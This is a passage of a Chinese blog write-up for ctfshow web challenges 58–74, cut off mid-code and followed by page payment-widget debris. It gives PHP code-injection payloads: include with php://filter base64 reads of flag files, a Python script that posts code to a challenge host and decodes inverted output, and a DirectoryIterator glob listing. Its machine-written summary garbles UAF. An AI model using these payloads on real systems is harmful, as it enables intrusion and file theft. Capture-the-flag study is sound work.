ctfshow-Web入门-58~74wp

博客内容涉及多个PHP安全漏洞的利用方法,包括GET和POST请求的参数注入,通过base64编码绕过过滤,以及文件包含漏洞。还详细介绍了如何通过PHP代码解析ELF头来获取系统函数地址,并利用未初始化的缓冲区漏洞(UAF)触发系统调用来读取flag文件。此外,提到了蚁剑连接密码和获取flag位置的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

blog http://blog.yutian233.xyz/

Web58-65

POST
c=include($_GET['url']);

GET
/?url=php://filter/read=convert.base64-encode/resource=flag.php

Web66-70

flag 换位置了
/flag.txt

Payload还可以用

Web71

import requests

url = "http://c5e8824e-b5b4-4842-8d39-bbcb78eb7976.chall.ctf.show/"

d = {'c': 'include("/flag.txt");echo ~ob_get_contents();'}
s = requests.post(url, d).content



for i in s:
    print(chr(~i&0xff), end='')
# 脚本来自群大佬阿狸

或者 c=include"/flag.txt";exit(0);

Web72

解法来自 链接

c=?><?php
	$a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{
   echo($f
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值